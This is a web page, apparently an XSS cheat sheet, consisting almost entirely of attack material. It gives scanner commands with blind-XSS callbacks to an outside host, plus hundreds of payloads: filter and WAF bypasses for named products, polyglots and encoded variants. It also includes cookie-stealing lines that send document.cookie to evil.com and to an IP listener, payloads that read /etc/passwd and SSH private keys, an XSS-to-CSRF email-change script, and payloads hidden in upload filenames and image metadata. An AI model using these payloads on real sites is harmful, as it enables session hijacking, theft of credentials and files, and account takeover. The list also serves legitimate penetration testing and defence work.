XSS
Cross-Site Scripting (XSS) Cheat Sheet - 2021 Edition | Web Security Academy
WebSecAcademy
Try XSS in every input field, host header, URL redirection, URI parameter and file upload filename.
Actions: phishing through iframe, cookie stealing; always try to convert self-XSS into reflected XSS.

Tools

# https://github.com/hahwul/dalfox
dalfox url http://testphp.vulnweb.com/listproducts.php
# https://github.com/KathanP19/Gxss
# Replace every param value with word FUZZ
echo "https://target.com/some.php?first=hello&last=world" | Gxss -c 100
# XSpear
gem install XSpear
XSpear -u 'https://web.com' -a
XSpear -u 'https://www.web.com/?q=123' --cookie='role=admin' -v 1 -a -b https://six2dez.xss.ht -t 20
XSpear -u "http://testphp.vulnweb.com/search.php?test=query" -p test -v 1
# Xira
# https://github.com/xadhrit/xira
python3 xira.py -u url
# Hosting XSS
# surge.sh
npm install --global surge
mkdir mypayload
cd mypayload
echo "alert(1)" > payload.js
surge # It returns the url
# XSS vectors
https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45
# Payload list
https://github.com/m0chan/BugBounty/blob/master/xss-payload-list.txt
https://github.com/terjanq/Tiny-XSS-Payloads
# XSS to RCE
# https://github.com/shelld3v/JSshell
# Polyglots
# https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
# XSS browser
# https://github.com/RenwaX23/XSSTRON
# Blind
# https://github.com/hipotermia/vaya-ciego-nen

Oneliners

# WaybackUrls
echo "domain.com" | waybackurls | httpx -silent | Gxss -c 100 -p Xss | sort -u | dalfox pipe -b https://six2dez.xss.ht
# Param discovery based
paramspider -d target.com > /filepath/param.txt && dalfox -b https://six2dez.xss.ht file /filepath/param.txt
# Blind XSS (point -b at your own blind-XSS listener, not the example host, or the callbacks will never reach you)
cat target_list.txt | waybackurls -no-subs | grep "https://" | grep -v "png\|jpg\|css\|js\|gif\|txt" | grep "=" | qsreplace -a | dalfox pipe -b https://six2dez.xss.ht
# Reflected XSS
echo "domain.com" | waybackurls | gf xss | kxss

XSS compilation

Basics

# Locators
'';!--"<XSS>=&{()}
# 101
<script>alert(1)</script>
<script>+-+-1-+-+alert(1)</script>
<script>+-+-1-+-+alert(/xss/)</script>
%3Cscript%3Ealert(0)%3C%2Fscript%3E
%253Cscript%253Ealert(0)%253C%252Fscript%253E
<svg onload=alert(1)>
"><svg onload=alert(1)>
<iframe src="javascript:alert(1)">
"><script src=data:&comma;alert(1)//
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
%5B'-alert(document.cookie)-'%5D

By tag

# Tag filter bypass
<svg/onload=alert(1)>
<script>alert(1)</script>
<script >alert(1)</script>
<ScRipT>alert(1)</sCriPt>
<%00script>alert(1)</script>
<script>al%00ert(1)</script>
# HTML tags
<img/src=x a='' onerror=alert(1)>
<IMG """><SCRIPT>alert(1)</SCRIPT>">
<img src=`x`onerror=alert(1)>
<img src='/' onerror='alert("kalisa")'>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<SCRIPT SRC=http:/evil.com/xss.js?< B >
"><XSS<test accesskey=x onclick=alert(1)//test
<svg><discard onbegin=alert(1)>
<script>image = new Image(); image.src="https://evil.com/?c="+document.cookie;</script>
<script>image = new Image(); image.src="http://"+document.cookie+"evil.com/";</script>
# Other tags
<BASE HREF="javascript:alert('XSS');//">
<DIV STYLE="width: expression(alert('XSS'));">
<TABLE BACKGROUND="javascript:alert('XSS')">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<xss id=x tabindex=1 onactivate=alert(1)></xss>
<xss onclick="alert(1)">test</xss>
<xss onmousedown="alert(1)">test</xss>
<body onresize=alert(1)>"onload=this.style.width='100px'>
<xss id=x onfocus=alert(document.cookie)tabindex=1>#x';</script>
# CharCode
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
# Input already in script tag
@domain.com">user+'-alert`1`-'@domain.com
# Scriptless
<link rel=icon href="//evil?
<iframe src="//evil?
<iframe src="//evil?
<input type=hidden type=image src="//evil?
# Unclosed Tags
<svg onload=alert(1)//

Blind

# Blind XSS
# https://github.com/LewisArdern/bXSS
# https://github.com/ssl/ezXSS
# https://xsshunter.com/
# Blind XSS detection
# Xsshunter payload in every field
# Review forms
# Contact Us pages
# Passwords (you never know whether the other side handles input properly and whether your password is shown in view mode)
# Address fields of e-commerce sites
# First or Last Name field while doing Credit Card Payments
# Set User-Agent to a Blind XSS payload. You can do that easily from a proxy such as Burp Suite.
# Log Viewers
# Feedback Page
# Chat Applications
# Any app that requires user moderation
# Host header
# Why cancel subscription? forms

Bypasses

# No parentheses
<script>onerror=alert;throw 1</script>
<script>throw onerror=eval,'=alert\x281\x29'</script>
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
<script>location='javascript:alert\x281\x29'</script>
<script>alert`1`</script>
<script>new Function`X${document.location.hash.substr`1`}`</script>
# No parentheses and no semicolons
<script>{onerror=alert}throw 1</script>
<script>throw onerror=alert,1</script>
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>
# No parentheses and no spaces:
<script>Function`X${document.location.hash.substr`1`}```</script>
# Angle brackets HTML encoded (in an attribute)
"onmouseover="alert(1)
'-alert(1)-'
# If quote is escaped
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
# Embedded tab, newline, carriage return to break up XSS
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
# RegEx bypass
<img src="X" onerror=top[8680439..toString(30)](1337)>
# Other
<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>: base64 value which decodes to alert('XSS')

Encoded

# Unicode
<script>\u0061lert(1)</script>
<script>\u{61}lert(1)</script>
<script>\u{0000000061}lert(1)</script>
# Hex
<script>eval('\x61lert(1)')</script>
# HTML
<svg><script>&#97;lert(1)</script></svg>
<svg><script>&#x61;lert(1)</script></svg>
<svg><script>alert&NewLine;(1)</script></svg>
<svg><script>x="&quot;,alert(1)//";</script></svg>
\’-alert(1)//
# URL
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
# Double URL Encode
%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
# Unicode + HTML
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
# HTML + URL
<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>

Polyglots

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=alert(2)>%5Cx3e
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(document.domain)//'>
javascript:alert();//<img src=x:x onerror=alert(1)>\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert()><svg onload=alert()><!--
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
```
%3C!%27/!%22/!\%27/\%22/ — !%3E%3C/Title/%3C/script/%3E%3CInput%20Type=Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm1%20//%3E#
<!'/!”/!\'/\"/ — !></Title/</script/><Input Type=Text Style=position:fixed;top:0;left:0;font-size:999px */; Onmouseenter=confirm1 //>#
jaVasCript:/-//*\/'/"/*/(/ */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">>
” ></plaintext></|><plaintext/onmouseover=prompt(1) >prompt(1)@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →” > "></script>alert(1)”><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">">
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
?msg=<img/src=`%00`%20onerror=this.onerror=confirm(1)
<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>
<sVg/oNloAd="JaVaScRiPt:/**\/*\'/"\eval(atob('Y29uZmlybShkb2N1bWVudC5kb21haW4pOw=='))"> <iframe src=jaVaScrIpT:eval(atob('Y29uZmlybShkb2N1bWVudC5kb21haW4pOw=='))>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouse over=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><imgsrc="http://i.imgur.com/P8mL8.jpg">
# No parenthesis, back ticks, brackets, quotes, braces
a=1337,b=confirm,c=window,c.onerror=b;throw-a
# Another uncommon
'-(a=alert,b="_Y000!_",[b].find(a))-'
# Common XSS in HTML Injection
<svg onload=alert(1)>
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
q=<script/&q=/src=data:&q=alert(1)>
<script src=data:,alert(1)>
# inline
"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //
# src attribute
javascript:alert(1)
# JS injection
'-alert(1)-'
'/alert(1)//
\'/alert(1)//
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
/alert(1)//\
/alert(1)}//\
${alert(1)}
# XSS onscroll
<p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y
# XSS filter bypass polyglot:
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) }; x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>
" <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); </script>
# GO SSTI
{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}`
# Some XSS exploitations
- host header injection through xss
add referer: batman
hostheader: bing.com">script>alert(document.domain)</script><"
- URL redirection through xss
document.location.href="http://evil.com"
- phishing through xss - iframe injection
<iframe src="http://evil.com" height="100" width="100"></iframe>
- Cookie stealing through xss
https://github.com/lnxg33k/misc/blob/master/XSS-cookie-stealer.py
https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md
<script>var i=new Image;i.src="http://172.30.5.46:8888/?"+document.cookie;</script>
<img src=x onerror=this.src='http://172.30.5.46:8888/?'+document.cookie;>
<img src=x onerror="this.src='http://172.30.5.46:8888/?'+document.cookie; this.removeAttribute('onerror');">
- file upload through xss
upload a picture file, intercept the request, and change picturename.jpg to an XSS payload using an Intruder attack
- remote file inclusion (RFI) through xss
php?=http://brutelogic.com.br/poc.svg - xsspayload
- convert self xss to reflected one
save the response as file.html and open it -> it will work
# XSS to SSRF
<esi:include src="http://yoursite.com/capture" />
# XSS to LFI (only works where the rendering context can read file:// URLs, e.g. a server-side headless browser or HTML-to-PDF converter; a normal browser blocks file:// reads from an http(s) origin)
<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send();</script>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</scrip>

XSS in files

# XSS in filename:
"><img src=x onerror=alert(document.domain)>.gif
# XSS in metadata:
exiftool -FIELD=XSS FILE
exiftool -Artist=' "><img src=1 onerror=alert(document.domain)>' brute.jpeg
exiftool -Artist='"><script>alert(1)</script>' dapos.jpeg
# XSS in GIF Magic Number:
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
# If image can't load:
url.com/test.php?p=<script src=http://url.com/upload/img/xss.gif>
# XSS in png:
https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/
# XSS in PDF:
https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html?m=1
# XSS upload filename:
cp somefile.txt \"\>\<img\ src\ onerror=prompt\(1\)\>
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
"><svg onload=alert(1)>.gif
# XSS Svg Image upload
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS!');
</script>
</svg>
# XSS svg image upload 2
# If you're testing a text editor on a system that you can also upload files to, try to embed an svg:
<iframe src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/movingcart_1.svg" frameborder="0"></iframe>
#If that works, upload an SVG with the following content and try rendering it using the text editor:
<svg xmlns="http://www.w3.org/2000/svg">
<script>alert(document.domain)</script>
</svg>
# XSS in SVG 3:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
# XSS in XML
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>
# https://brutelogic.com.br/blog/file-upload-xss/
" ="" '></><script></script><svg onload"="alertonload=alert(1)"" onload=setInterval'alert\x28document.domain\x29'
# XSS in existent jpeg:
exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg
# XSS in url (and put as header)
http://acme.corp/?redir=[URI_SCHEME]://gremwell.com%0A%0A[XSS_PAYLOAD]
# XSS in XML
<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>

DOM XSS

<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<svg><svg onload=alert(1)>
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')">
"><svg onload=alert(1)>
javascript:alert(document.cookie)
\"-alert(1)}//

XSS to CSRF

# Example:
# Find the change-email action (protected by an anti-CSRF token), fetch the token, and paste this in a comment to change the user's email:
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&[email protected]')
};
</script>

AngularJS Sandbox

# Removed in AngularJS 1.6
# It is a mechanism that blocks access to some strings/objects such as window, document or __proto__.
# Without strings:
/?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1
# With CSP:
<script>
location='https://your-lab-id.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x';
</script>
# v 1.6 and up
{{$new.constructor('alert(1)')()}}
<x ng-app>{{$new.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
{{constructor.constructor('import("https://six2dez.xss.ht")')()}}
{{$on.constructor('alert(1)')()}}
{{{}.")));alert(1)//"}}
{{{}.")));alert(1)//"}}
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

XSS in JS

# Inside JS script:
</script><img src=1 onerror=alert(document.domain)>
</script><script>alert(1)</script>
# Inside JS literal script:
'-alert(document.domain)-'
';alert(document.domain)//
'-alert(1)-'
# Inside JS that escape special chars:
If ';alert(document.domain)// is converted into \';alert(document.domain)//
Use \';alert(document.domain)// to obtain \\';alert(document.domain)//
\'-alert(1)//
# Inside JS with some char blocked:
onerror=alert;throw 1
/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27
# Inside {}
${alert(document.domain)}
${alert(1)}

XSS Waf Bypasses

# Only lowercase block
<sCRipT>alert(1)</sCRipT>
# Break regex
<script>%0aalert(1)</script>
# Double encoding
%2522
# Recursive filters
<scr<script>ipt>alert(1)</scr</script>ipt>
# Inject anchor tag
<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">
# Bypass whitespaces
<svg·onload=alert(1)>
# Change GET to POST request
# Imperva Incapsula
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
<img/src="x"/onerror="[JS-F**K Payload]">
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';><img/src=q onerror='new Function`al\ert\`1\``'>
# WebKnight
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
# F5 Big IP
<body style="height:1000px" onwheel="[DATA]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
<body style="height:1000px" onwheel="[JS-F**k Payload]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[JS-F**k Payload]">
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
# Barracuda WAF
<body style="height:1000px" onwheel="alert(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
# PHP-IDS
<svg+onload=+"[DATA]"
<svg+onload=+"aler%25%37%34(1)"
# Mod-Security
<a href="j[785 bytes of (&NewLine;&Tab;)]avascript:alert(1);">XSS</a>
1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
# Quick Defense:
<input type="search" onsearch="aler\u0074(1)">
<details ontoggle="aler\u0074(1)">
# Sucuri WAF
1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4
# Akamai
1%3C/script%3E%3Csvg/onload=prompt(document[domain])%3E
<SCr%00Ipt>confirm(1)</scR%00ipt>
# AngularJS
{{constructor.constructor(alert 1 )()}}

XSS Mindmap
